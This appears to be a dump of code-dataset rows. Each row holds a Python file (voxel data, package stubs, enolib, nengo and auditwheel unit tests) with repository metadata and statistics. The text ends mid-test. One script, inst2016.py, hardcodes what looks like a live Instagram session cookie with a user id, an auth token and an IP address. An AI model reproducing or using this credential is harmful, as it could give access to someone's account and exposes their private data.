VM[6,7,7] = 1.00
VM[7,7,7] = 1.00
VM[8,7,7] = 1.00
VM[9,7,7] = 0.99
VM[10,7,7] = 0.21
VM[0,8,7] = 0.00
VM[1,8,7] = 0.62
VM[2,8,7] = 1.00
VM[3,8,7] = 1.00
VM[4,8,7] = 1.00
VM[5,8,7] = 1.00
VM[6,8,7] = 1.00
VM[7,8,7] = 1.00
VM[8,8,7] = 1.00
VM[9,8,7] = 0.62
VM[10,8,7] = 0.00
VM[0,9,7] = 0.00
VM[1,9,7] = 0.04
VM[2,9,7] = 0.62
VM[3,9,7] = 0.99
VM[4,9,7] = 1.00
VM[5,9,7] = 1.00
VM[6,9,7] = 1.00
VM[7,9,7] = 0.99
VM[8,9,7] = 0.62
VM[9,9,7] = 0.04
VM[10,9,7] = 0.00
VM[0,10,7] = 0.00
VM[1,10,7] = 0.00
VM[2,10,7] = 0.00
VM[3,10,7] = 0.21
VM[4,10,7] = 0.52
VM[5,10,7] = 0.60
VM[6,10,7] = 0.52
VM[7,10,7] = 0.21
VM[8,10,7] = 0.00
VM[9,10,7] = 0.00
VM[10,10,7] = 0.00
VM[0,0,8] = 0.00
VM[1,0,8] = 0.00
VM[2,0,8] = 0.00
VM[3,0,8] = 0.00
VM[4,0,8] = 0.07
VM[5,0,8] = 0.14
VM[6,0,8] = 0.07
VM[7,0,8] = 0.00
VM[8,0,8] = 0.00
VM[9,0,8] = 0.00
VM[10,0,8] = 0.00
VM[0,1,8] = 0.00
VM[1,1,8] = 0.00
VM[2,1,8] = 0.14
VM[3,1,8] = 0.62
VM[4,1,8] = 0.91
VM[5,1,8] = 0.96
VM[6,1,8] = 0.91
VM[7,1,8] = 0.62
VM[8,1,8] = 0.14
VM[9,1,8] = 0.00
VM[10,1,8] = 0.00
VM[0,2,8] = 0.00
VM[1,2,8] = 0.14
VM[2,2,8] = 0.84
VM[3,2,8] = 1.00
VM[4,2,8] = 1.00
VM[5,2,8] = 1.00
VM[6,2,8] = 1.00
VM[7,2,8] = 1.00
VM[8,2,8] = 0.84
VM[9,2,8] = 0.14
VM[10,2,8] = 0.00
VM[0,3,8] = 0.00
VM[1,3,8] = 0.62
VM[2,3,8] = 1.00
VM[3,3,8] = 1.00
VM[4,3,8] = 1.00
VM[5,3,8] = 1.00
VM[6,3,8] = 1.00
VM[7,3,8] = 1.00
VM[8,3,8] = 1.00
VM[9,3,8] = 0.62
VM[10,3,8] = 0.00
VM[0,4,8] = 0.07
VM[1,4,8] = 0.91
VM[2,4,8] = 1.00
VM[3,4,8] = 1.00
VM[4,4,8] = 1.00
VM[5,4,8] = 1.00
VM[6,4,8] = 1.00
VM[7,4,8] = 1.00
VM[8,4,8] = 1.00
VM[9,4,8] = 0.91
VM[10,4,8] = 0.07
VM[0,5,8] = 0.14
VM[1,5,8] = 0.96
VM[2,5,8] = 1.00
VM[3,5,8] = 1.00
VM[4,5,8] = 1.00
VM[5,5,8] = 1.00
VM[6,5,8] = 1.00
VM[7,5,8] = 1.00
VM[8,5,8] = 1.00
VM[9,5,8] = 0.96
VM[10,5,8] = 0.14
VM[0,6,8] = 0.07
VM[1,6,8] = 0.91
VM[2,6,8] = 1.00
VM[3,6,8] = 1.00
VM[4,6,8] = 1.00
VM[5,6,8] = 1.00
VM[6,6,8] = 1.00
VM[7,6,8] = 1.00
VM[8,6,8] = 1.00
VM[9,6,8] = 0.91
VM[10,6,8] = 0.07
VM[0,7,8] = 0.00
VM[1,7,8] = 0.62
VM[2,7,8] = 1.00
VM[3,7,8] = 1.00
VM[4,7,8] = 1.00
VM[5,7,8] = 1.00
VM[6,7,8] = 1.00
VM[7,7,8] = 1.00
VM[8,7,8] = 1.00
VM[9,7,8] = 0.62
VM[10,7,8] = 0.00
VM[0,8,8] = 0.00
VM[1,8,8] = 0.14
VM[2,8,8] = 0.84
VM[3,8,8] = 1.00
VM[4,8,8] = 1.00
VM[5,8,8] = 1.00
VM[6,8,8] = 1.00
VM[7,8,8] = 1.00
VM[8,8,8] = 0.84
VM[9,8,8] = 0.14
VM[10,8,8] = 0.00
VM[0,9,8] = 0.00
VM[1,9,8] = 0.00
VM[2,9,8] = 0.14
VM[3,9,8] = 0.62
VM[4,9,8] = 0.91
VM[5,9,8] = 0.96
VM[6,9,8] = 0.91
VM[7,9,8] = 0.62
VM[8,9,8] = 0.14
VM[9,9,8] = 0.00
VM[10,9,8] = 0.00
VM[0,10,8] = 0.00
VM[1,10,8] = 0.00
VM[2,10,8] = 0.00
VM[3,10,8] = 0.00
VM[4,10,8] = 0.07
VM[5,10,8] = 0.14
VM[6,10,8] = 0.07
VM[7,10,8] = 0.00
VM[8,10,8] = 0.00
VM[9,10,8] = 0.00
VM[10,10,8] = 0.00
VM[0,0,9] = 0.00
VM[1,0,9] = 0.00
VM[2,0,9] = 0.00
VM[3,0,9] = 0.00
VM[4,0,9] = 0.00
VM[5,0,9] = 0.00
VM[6,0,9] = 0.00
VM[7,0,9] = 0.00
VM[8,0,9] = 0.00
VM[9,0,9] = 0.00
VM[10,0,9] = 0.00
VM[0,1,9] = 0.00
VM[1,1,9] = 0.00
VM[2,1,9] = 0.00
VM[3,1,9] = 0.04
VM[4,1,9] = 0.19
VM[5,1,9] = 0.24
VM[6,1,9] = 0.19
VM[7,1,9] = 0.04
VM[8,1,9] = 0.00
VM[9,1,9] = 0.00
VM[10,1,9] = 0.00
VM[0,2,9] = 0.00
VM[1,2,9] = 0.00
VM[2,2,9] = 0.14
VM[3,2,9] = 0.62
VM[4,2,9] = 0.91
VM[5,2,9] = 0.96
VM[6,2,9] = 0.91
VM[7,2,9] = 0.62
VM[8,2,9] = 0.14
VM[9,2,9] = 0.00
VM[10,2,9] = 0.00
VM[0,3,9] = 0.00
VM[1,3,9] = 0.04
VM[2,3,9] = 0.62
VM[3,3,9] = 0.99
VM[4,3,9] = 1.00
VM[5,3,9] = 1.00
VM[6,3,9] = 1.00
VM[7,3,9] = 0.99
VM[8,3,9] = 0.62
VM[9,3,9] = 0.04
VM[10,3,9] = 0.00
VM[0,4,9] = 0.00
VM[1,4,9] = 0.19
VM[2,4,9] = 0.91
VM[3,4,9] = 1.00
VM[4,4,9] = 1.00
VM[5,4,9] = 1.00
VM[6,4,9] = 1.00
VM[7,4,9] = 1.00
VM[8,4,9] = 0.91
VM[9,4,9] = 0.19
VM[10,4,9] = 0.00
VM[0,5,9] = 0.00
VM[1,5,9] = 0.24
VM[2,5,9] = 0.96
VM[3,5,9] = 1.00
VM[4,5,9] = 1.00
VM[5,5,9] = 1.00
VM[6,5,9] = 1.00
VM[7,5,9] = 1.00
VM[8,5,9] = 0.96
VM[9,5,9] = 0.24
VM[10,5,9] = 0.00
VM[0,6,9] = 0.00
VM[1,6,9] = 0.19
VM[2,6,9] = 0.91
VM[3,6,9] = 1.00
VM[4,6,9] = 1.00
VM[5,6,9] = 1.00
VM[6,6,9] = 1.00
VM[7,6,9] = 1.00
VM[8,6,9] = 0.91
VM[9,6,9] = 0.19
VM[10,6,9] = 0.00
VM[0,7,9] = 0.00
VM[1,7,9] = 0.04
VM[2,7,9] = 0.62
VM[3,7,9] = 0.99
VM[4,7,9] = 1.00
VM[5,7,9] = 1.00
VM[6,7,9] = 1.00
VM[7,7,9] = 0.99
VM[8,7,9] = 0.62
VM[9,7,9] = 0.04
VM[10,7,9] = 0.00
VM[0,8,9] = 0.00
VM[1,8,9] = 0.00
VM[2,8,9] = 0.14
VM[3,8,9] = 0.62
VM[4,8,9] = 0.91
VM[5,8,9] = 0.96
VM[6,8,9] = 0.91
VM[7,8,9] = 0.62
VM[8,8,9] = 0.14
VM[9,8,9] = 0.00
VM[10,8,9] = 0.00
VM[0,9,9] = 0.00
VM[1,9,9] = 0.00
VM[2,9,9] = 0.00
VM[3,9,9] = 0.04
VM[4,9,9] = 0.19
VM[5,9,9] = 0.24
VM[6,9,9] = 0.19
VM[7,9,9] = 0.04
VM[8,9,9] = 0.00
VM[9,9,9] = 0.00
VM[10,9,9] = 0.00
VM[0,10,9] = 0.00
VM[1,10,9] = 0.00
VM[2,10,9] = 0.00
VM[3,10,9] = 0.00
VM[4,10,9] = 0.00
VM[5,10,9] = 0.00
VM[6,10,9] = 0.00
VM[7,10,9] = 0.00
VM[8,10,9] = 0.00
VM[9,10,9] = 0.00
VM[10,10,9] = 0.00
VM[0,0,10] = 0.00
VM[1,0,10] = 0.00
VM[2,0,10] = 0.00
VM[3,0,10] = 0.00
VM[4,0,10] = 0.00
VM[5,0,10] = 0.00
VM[6,0,10] = 0.00
VM[7,0,10] = 0.00
VM[8,0,10] = 0.00
VM[9,0,10] = 0.00
VM[10,0,10] = 0.00
VM[0,1,10] = 0.00
VM[1,1,10] = 0.00
VM[2,1,10] = 0.00
VM[3,1,10] = 0.00
VM[4,1,10] = 0.00
VM[5,1,10] = 0.00
VM[6,1,10] = 0.00
VM[7,1,10] = 0.00
VM[8,1,10] = 0.00
VM[9,1,10] = 0.00
VM[10,1,10] = 0.00
VM[0,2,10] = 0.00
VM[1,2,10] = 0.00
VM[2,2,10] = 0.00
VM[3,2,10] = 0.00
VM[4,2,10] = 0.07
VM[5,2,10] = 0.14
VM[6,2,10] = 0.07
VM[7,2,10] = 0.00
VM[8,2,10] = 0.00
VM[9,2,10] = 0.00
VM[10,2,10] = 0.00
VM[0,3,10] = 0.00
VM[1,3,10] = 0.00
VM[2,3,10] = 0.00
VM[3,3,10] = 0.21
VM[4,3,10] = 0.52
VM[5,3,10] = 0.60
VM[6,3,10] = 0.52
VM[7,3,10] = 0.21
VM[8,3,10] = 0.00
VM[9,3,10] = 0.00
VM[10,3,10] = 0.00
VM[0,4,10] = 0.00
VM[1,4,10] = 0.00
VM[2,4,10] = 0.07
VM[3,4,10] = 0.52
VM[4,4,10] = 0.80
VM[5,4,10] = 0.90
VM[6,4,10] = 0.80
VM[7,4,10] = 0.52
VM[8,4,10] = 0.07
VM[9,4,10] = 0.00
VM[10,4,10] = 0.00
VM[0,5,10] = 0.00
VM[1,5,10] = 0.00
VM[2,5,10] = 0.14
VM[3,5,10] = 0.60
VM[4,5,10] = 0.90
VM[5,5,10] = 1.00
VM[6,5,10] = 0.90
VM[7,5,10] = 0.60
VM[8,5,10] = 0.14
VM[9,5,10] = 0.00
VM[10,5,10] = 0.00
VM[0,6,10] = 0.00
VM[1,6,10] = 0.00
VM[2,6,10] = 0.07
VM[3,6,10] = 0.52
VM[4,6,10] = 0.80
VM[5,6,10] = 0.90
VM[6,6,10] = 0.80
VM[7,6,10] = 0.52
VM[8,6,10] = 0.07
VM[9,6,10] = 0.00
VM[10,6,10] = 0.00
VM[0,7,10] = 0.00
VM[1,7,10] = 0.00
VM[2,7,10] = 0.00
VM[3,7,10] = 0.21
VM[4,7,10] = 0.52
VM[5,7,10] = 0.60
VM[6,7,10] = 0.52
VM[7,7,10] = 0.21
VM[8,7,10] = 0.00
VM[9,7,10] = 0.00
VM[10,7,10] = 0.00
VM[0,8,10] = 0.00
VM[1,8,10] = 0.00
VM[2,8,10] = 0.00
VM[3,8,10] = 0.00
VM[4,8,10] = 0.07
VM[5,8,10] = 0.14
VM[6,8,10] = 0.07
VM[7,8,10] = 0.00
VM[8,8,10] = 0.00
VM[9,8,10] = 0.00
VM[10,8,10] = 0.00
VM[0,9,10] = 0.00
VM[1,9,10] = 0.00
VM[2,9,10] = 0.00
VM[3,9,10] = 0.00
VM[4,9,10] = 0.00
VM[5,9,10] = 0.00
VM[6,9,10] = 0.00
VM[7,9,10] = 0.00
VM[8,9,10] = 0.00
VM[9,9,10] = 0.00
VM[10,9,10] = 0.00
VM[0,10,10] = 0.00
VM[1,10,10] = 0.00
VM[2,10,10] = 0.00
VM[3,10,10] = 0.00
VM[4,10,10] = 0.00
VM[5,10,10] = 0.00
VM[6,10,10] = 0.00
VM[7,10,10] = 0.00
VM[8,10,10] = 0.00
VM[9,10,10] = 0.00
VM[10,10,10] = 0.00
N = 11
M = 11
K = 11
g = draw_voxel_model(VM, N, M, K)
| 17.467495 | 82 | 0.481328 | 8,150 | 23,913 | 1.410184 | 0.011043 | 0.305577 | 0.203167 | 0.043853 | 0.956669 | 0 | 0 | 0 | 0 | 0 | 0 | 0.427014 | 0.179233 | 23,913 | 1,368 | 83 | 17.480263 | 0.158557 | 0 | 0 | 0 | 0 | 0 | 0.000125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.000734 | false | 0 | 0.001467 | 0 | 0.002935 | 0 | 0 | 0 | 1 | null | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
97f41302bffab8aea500ac607cc8ac3aa035a62b | 59 | py | Python | kornia/io/__init__.py | kornia/kornia-io | 35b121f1a434a3868d346a757be0ec24bbdaee65 | [
"Apache-2.0"
] | 2 | 2020-04-12T10:17:14.000Z | 2021-12-22T14:50:17.000Z | kornia/io/__init__.py | kornia/kornia-io | 35b121f1a434a3868d346a757be0ec24bbdaee65 | [
"Apache-2.0"
] | null | null | null | kornia/io/__init__.py | kornia/kornia-io | 35b121f1a434a3868d346a757be0ec24bbdaee65 | [
"Apache-2.0"
] | null | null | null | from .dali import DaliImageReader, DaliImageCollateWrapper
| 29.5 | 58 | 0.881356 | 5 | 59 | 10.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.084746 | 59 | 1 | 59 | 59 | 0.962963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3f53b0d2db6006a738ae704fe74197533caab1c6 | 651 | py | Python | examples/minitwit/inst2016.py | txdywy/flask | 5cf167b448267aedec8f5b2e30ad4ee0ad9b3f55 | [
"BSD-3-Clause"
] | 2 | 2015-08-07T18:01:01.000Z | 2015-08-14T03:29:10.000Z | examples/minitwit/inst2016.py | txdywy/flask | 5cf167b448267aedec8f5b2e30ad4ee0ad9b3f55 | [
"BSD-3-Clause"
] | 2 | 2015-03-30T05:28:35.000Z | 2015-06-28T01:08:50.000Z | examples/minitwit/inst2016.py | txdywy/flask | 5cf167b448267aedec8f5b2e30ad4ee0ad9b3f55 | [
"BSD-3-Clause"
] | 2 | 2015-03-04T05:06:55.000Z | 2015-03-29T22:46:19.000Z | import mei
import time
t = "IGSC341f55974baadb2775ff551acc9fb1625fb9466061411e4e6a8ad0cd8806d7c0%3AUQR4evOb50AbefuIH60POSuGzddobOKU%3A%7B%22asns%22%3A%7B%22time%22%3A1498550402%2C%2223.99.114.67%22%3A8075%7D%2C%22_auth_user_hash%22%3A%22%22%2C%22_auth_user_backend%22%3A%22accounts.backends.CaseInsensitiveModelBackend%22%2C%22_token%22%3A%222969173752%3AZOYZQFh3sPzMzvhXQ51CooOAbUVvhq8F%3A8b8c328f724c0df8c8cba73615054f50873ccdd33e8f3b6a97e5b222759cd654%22%2C%22_token_ver%22%3A2%2C%22_platform%22%3A4%2C%22_auth_user_id%22%3A2969173752%2C%22last_refreshed%22%3A1498550403.2377448082%7D;"
for i in range(10):
mei.test_new(t)
time.sleep(60)
| 81.375 | 566 | 0.855607 | 90 | 651 | 6.022222 | 0.544444 | 0.04428 | 0.04428 | 0.066421 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.377389 | 0.03533 | 651 | 7 | 567 | 93 | 0.485669 | 0 | 0 | 0 | 0 | 0.166667 | 0.860215 | 0.860215 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
58c672442b8959c32add3d6af0706cda47534803 | 32 | py | Python | src/example_package/random_file.py | szemyd/packaging-python-public | e16fed1f335d5f5153f21e40afb1add21c712973 | [
"MIT"
] | null | null | null | src/example_package/random_file.py | szemyd/packaging-python-public | e16fed1f335d5f5153f21e40afb1add21c712973 | [
"MIT"
] | null | null | null | src/example_package/random_file.py | szemyd/packaging-python-public | e16fed1f335d5f5153f21e40afb1add21c712973 | [
"MIT"
] | null | null | null | def random_function():
pass
| 10.666667 | 22 | 0.6875 | 4 | 32 | 5.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.21875 | 32 | 2 | 23 | 16 | 0.84 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
58e32aefef70cad8d1a60c31bff1a82852871c22 | 19 | py | Python | pyocs/__init__.py | rzshrote/PyOCS | c02422b418961aa5a1f308d0251b8bf551912db2 | [
"Apache-2.0"
] | null | null | null | pyocs/__init__.py | rzshrote/PyOCS | c02422b418961aa5a1f308d0251b8bf551912db2 | [
"Apache-2.0"
] | null | null | null | pyocs/__init__.py | rzshrote/PyOCS | c02422b418961aa5a1f308d0251b8bf551912db2 | [
"Apache-2.0"
] | null | null | null | from .ocs import *
| 9.5 | 18 | 0.684211 | 3 | 19 | 4.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.210526 | 19 | 1 | 19 | 19 | 0.866667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
450ce03465dd38bb4ca1b797bfd63bb0d079a316 | 1,930 | py | Python | python/tests/generated/errors/parsing/test_missing_element_for_continuation.py | eno-lang/enolib | 4175f7c1e8246493b6758c29bddc80d20eaf15f7 | [
"MIT"
] | 17 | 2019-04-15T21:03:37.000Z | 2022-01-24T11:03:34.000Z | python/tests/generated/errors/parsing/test_missing_element_for_continuation.py | eno-lang/enolib | 4175f7c1e8246493b6758c29bddc80d20eaf15f7 | [
"MIT"
] | 20 | 2019-03-13T23:23:40.000Z | 2022-03-29T13:40:57.000Z | python/tests/generated/errors/parsing/test_missing_element_for_continuation.py | eno-lang/enolib | 4175f7c1e8246493b6758c29bddc80d20eaf15f7 | [
"MIT"
] | 4 | 2019-04-15T21:18:03.000Z | 2019-09-21T16:18:10.000Z | import enolib
def test_parsing_a_line_continuation_without_any_prior_element_raises_the_expected_parseerror():
error = None
input = ("| continuation")
try:
enolib.parse(input)
except enolib.ParseError as _error:
if isinstance(_error, enolib.ParseError):
error = _error
else:
raise _error
assert type(error) is enolib.ParseError
text = ("Line 1 contains a line continuation without a continuable element being specified before.")
assert error.text == text
snippet = (" Line | Content\n"
" > 1 | | continuation")
assert error.snippet == snippet
assert error.selection['from']['line'] == 0
assert error.selection['from']['column'] == 0
assert error.selection['to']['line'] == 0
assert error.selection['to']['column'] == 14
def test_parsing_a_line_continuation_preceded_by_a_copied_field_raises_the_expected_parseerror():
error = None
input = ("field: value\n"
"\n"
"copy < field\n"
"| illegal_continuation")
try:
enolib.parse(input)
except enolib.ParseError as _error:
if isinstance(_error, enolib.ParseError):
error = _error
else:
raise _error
assert type(error) is enolib.ParseError
text = ("Line 4 contains a line continuation without a continuable element being specified before.")
assert error.text == text
snippet = (" Line | Content\n"
" ...\n"
" 2 | \n"
" 3 | copy < field\n"
" > 4 | | illegal_continuation")
assert error.snippet == snippet
assert error.selection['from']['line'] == 3
assert error.selection['from']['column'] == 0
assert error.selection['to']['line'] == 3
assert error.selection['to']['column'] == 22 | 29.692308 | 104 | 0.58601 | 209 | 1,930 | 5.244019 | 0.272727 | 0.120438 | 0.145985 | 0.087591 | 0.895985 | 0.841241 | 0.784672 | 0.709854 | 0.709854 | 0.709854 | 0 | 0.011896 | 0.303109 | 1,930 | 65 | 105 | 29.692308 | 0.802974 | 0 | 0 | 0.553191 | 0 | 0 | 0.230968 | 0 | 0 | 0 | 0 | 0 | 0.297872 | 1 | 0.042553 | false | 0 | 0.021277 | 0 | 0.06383 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4513f4aed71a1d907d2b7f0c327e4f99644ddd96 | 49 | py | Python | oceans/plotting/__init__.py | arnaldorusso/python-oceans | fb4dc2a7ee1add14b023b4830f47993061fe2e6a | [
"MIT"
] | null | null | null | oceans/plotting/__init__.py | arnaldorusso/python-oceans | fb4dc2a7ee1add14b023b4830f47993061fe2e6a | [
"MIT"
] | null | null | null | oceans/plotting/__init__.py | arnaldorusso/python-oceans | fb4dc2a7ee1add14b023b4830f47993061fe2e6a | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from .plotting import *
| 12.25 | 23 | 0.571429 | 6 | 49 | 4.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025641 | 0.204082 | 49 | 3 | 24 | 16.333333 | 0.692308 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
452a06e1996d47be0d14cef67bc448612881b74e | 2,462 | py | Python | nengo/utils/tests/test_functions_piecewise.py | HugoChateauLaurent/nengo | 749893186ee09aa6c621a40da3ffd3878114db9c | [
"BSD-2-Clause"
] | null | null | null | nengo/utils/tests/test_functions_piecewise.py | HugoChateauLaurent/nengo | 749893186ee09aa6c621a40da3ffd3878114db9c | [
"BSD-2-Clause"
] | null | null | null | nengo/utils/tests/test_functions_piecewise.py | HugoChateauLaurent/nengo | 749893186ee09aa6c621a40da3ffd3878114db9c | [
"BSD-2-Clause"
] | null | null | null | import numpy as np
import pytest
from nengo.exceptions import ValidationError
from nengo.utils.functions import piecewise
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_basic():
f = piecewise({0.5: 1, 1.0: 0})
assert np.allclose(f(-10), [0])
assert np.allclose(f(0), [0])
assert np.allclose(f(0.25), [0])
assert np.allclose(f(0.5), [1])
assert np.allclose(f(0.75), [1])
assert np.allclose(f(1.0), [0])
assert np.allclose(f(1.5), [0])
assert np.allclose(f(100), [0])
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_lists():
f = piecewise({0.5: [1, 0], 1.0: [0, 1]})
assert np.allclose(f(-10), [0, 0])
assert np.allclose(f(0), [0, 0])
assert np.allclose(f(0.25), [0, 0])
assert np.allclose(f(0.5), [1, 0])
assert np.allclose(f(0.75), [1, 0])
assert np.allclose(f(1.0), [0, 1])
assert np.allclose(f(1.5), [0, 1])
assert np.allclose(f(100), [0, 1])
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_invalid_key():
with pytest.raises(ValidationError):
f = piecewise({0.5: 1, 1: 0, 'a': 0.2})
assert f
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_invalid_length():
with pytest.raises(ValidationError):
f = piecewise({0.5: [1, 0], 1.0: [1, 0, 0]})
assert f
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_invalid_function_length():
with pytest.raises(ValidationError):
f = piecewise({0.5: 0, 1.0: lambda t: [t, t ** 2]})
assert f
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_function():
f = piecewise({0: np.sin, 0.5: np.cos})
assert np.allclose(f(0), [np.sin(0)])
assert np.allclose(f(0.25), [np.sin(0.25)])
assert np.allclose(f(0.4999), [np.sin(0.4999)])
assert np.allclose(f(0.5), [np.cos(0.5)])
assert np.allclose(f(0.75), [np.cos(0.75)])
assert np.allclose(f(1.0), [np.cos(1.0)])
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_function_list():
def func1(t):
return t, t**2, t**3
def func2(t):
return t**4, t**5, t**6
f = piecewise({0: func1, 0.5: func2})
assert np.allclose(f(0), func1(0))
assert np.allclose(f(0.25), func1(0.25))
assert np.allclose(f(0.4999), func1(0.4999))
assert np.allclose(f(0.5), func2(0.5))
assert np.allclose(f(0.75), func2(0.75))
assert np.allclose(f(1.0), func2(1.0))
| 30.02439 | 59 | 0.622665 | 406 | 2,462 | 3.746305 | 0.123153 | 0.147272 | 0.294543 | 0.312952 | 0.806049 | 0.780408 | 0.748849 | 0.57002 | 0.257068 | 0.132807 | 0 | 0.089295 | 0.176686 | 2,462 | 81 | 60 | 30.395062 | 0.661075 | 0 | 0 | 0.206349 | 0 | 0 | 0.07433 | 0.073924 | 0 | 0 | 0 | 0 | 0.492063 | 1 | 0.142857 | false | 0 | 0.063492 | 0.031746 | 0.238095 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7a0c067979eaca2f0dbd403e40b13050c938165c | 4,652 | py | Python | tests/unit/test_repair.py | luminartech/auditwheel | 83440f278c7c12c265c5e6d450305facc29f0a5e | [
"BSD-2-Clause"
] | 280 | 2016-02-07T18:41:15.000Z | 2022-03-26T05:28:26.000Z | tests/unit/test_repair.py | luminartech/auditwheel | 83440f278c7c12c265c5e6d450305facc29f0a5e | [
"BSD-2-Clause"
] | 331 | 2016-02-01T19:19:31.000Z | 2022-03-25T01:30:27.000Z | tests/unit/test_repair.py | luminartech/auditwheel | 83440f278c7c12c265c5e6d450305facc29f0a5e | [
"BSD-2-Clause"
] | 110 | 2016-03-16T11:33:18.000Z | 2022-02-23T11:58:21.000Z | import os
from unittest.mock import call, patch
from auditwheel.patcher import Patchelf
from auditwheel.repair import append_rpath_within_wheel
@patch("auditwheel.patcher._verify_patchelf")
@patch("auditwheel.patcher.check_output")
@patch("auditwheel.patcher.check_call")
class TestRepair:
def test_append_rpath(self, check_call, check_output, _):
patcher = Patchelf()
# When a library has an existing RPATH entry within wheel_dir
existing_rpath = b"$ORIGIN/.existinglibdir"
check_output.return_value = existing_rpath
wheel_dir = "."
lib_name = "test.so"
full_lib_name = os.path.abspath(lib_name)
append_rpath_within_wheel(lib_name, "$ORIGIN/.lib", wheel_dir, patcher)
check_output_expected_args = [
call(["patchelf", "--print-rpath", full_lib_name])
]
# Then that entry is preserved when updating the RPATH
check_call_expected_args = [
call(["patchelf", "--remove-rpath", full_lib_name]),
call(
[
"patchelf",
"--force-rpath",
"--set-rpath",
f"{existing_rpath.decode()}:$ORIGIN/.lib",
full_lib_name,
]
),
]
assert check_output.call_args_list == check_output_expected_args
assert check_call.call_args_list == check_call_expected_args
def test_append_rpath_reject_outside_wheel(self, check_call, check_output, _):
patcher = Patchelf()
# When a library has an existing RPATH entry outside wheel_dir
existing_rpath = b"/outside/wheel/dir"
check_output.return_value = existing_rpath
wheel_dir = "/not/outside"
lib_name = "test.so"
full_lib_name = os.path.abspath(lib_name)
append_rpath_within_wheel(lib_name, "$ORIGIN/.lib", wheel_dir, patcher)
check_output_expected_args = [
call(["patchelf", "--print-rpath", full_lib_name])
]
# Then that entry is eliminated when updating the RPATH
check_call_expected_args = [
call(["patchelf", "--remove-rpath", full_lib_name]),
call(
[
"patchelf",
"--force-rpath",
"--set-rpath",
"$ORIGIN/.lib",
full_lib_name,
]
),
]
assert check_output.call_args_list == check_output_expected_args
assert check_call.call_args_list == check_call_expected_args
def test_append_rpath_ignore_duplicates(self, check_call, check_output, _):
patcher = Patchelf()
# When a library has an existing RPATH entry and we try and append it again
existing_rpath = b"$ORIGIN"
check_output.return_value = existing_rpath
wheel_dir = "."
lib_name = "test.so"
full_lib_name = os.path.abspath(lib_name)
append_rpath_within_wheel(lib_name, "$ORIGIN", wheel_dir, patcher)
check_output_expected_args = [
call(["patchelf", "--print-rpath", full_lib_name])
]
# Then that entry is ignored when updating the RPATH
check_call_expected_args = [
call(["patchelf", "--remove-rpath", full_lib_name]),
call(
